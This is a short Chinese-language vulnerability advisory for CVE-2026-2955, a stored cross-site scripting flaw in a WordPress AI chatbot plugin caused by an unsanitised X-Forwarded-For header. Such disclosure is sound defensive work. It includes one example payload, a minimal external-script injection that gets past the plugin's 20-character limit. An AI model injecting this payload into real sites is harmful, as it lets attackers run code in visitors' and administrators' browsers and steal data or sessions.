CVE-2026-2955WordPress插件AI Chatbot & Workflow Automation by AIWU在1.4.14及以下版本中存在存储型跨站脚本(XSS)漏洞。该漏洞源于插件对HTTP请求头中的'X-Forwarded-For'字段缺乏足够的输入清理和输出转义。未经身份验证的攻击者可以通过恶意构造该请求头向服务器注入任意Web脚本。尽管存在20个字符的存储限制,但一旦攻击成功,当用户访问被注入的页面时,恶意脚本将在浏览器中执行,可能导致数据窃取或会话劫持。
该漏洞的根本原因是插件在处理客户端请求时,直接提取并存储了HTTP头中的`X-Forwarded-For`字段值,而未对其进行任何安全校验或过滤。`X-Forwarded-For`通常用于记录客户端真实IP,但极易被伪造。攻击者可利用此缺陷,在该字段中插入JavaScript代码。由于输出时未转义,当管理员或其他用户在后台日志或前端页面查看该数据时,脚本会被解析执行。虽然系统对该字段有20个字符的长度限制,这极大限制了直接注入复杂Payload的可能性,但攻击者仍可通过极短的外部脚本引用(如`<script src=//x>`)来绕过长度限制并加载恶意代码,从而在目标浏览器上下文中执行攻击。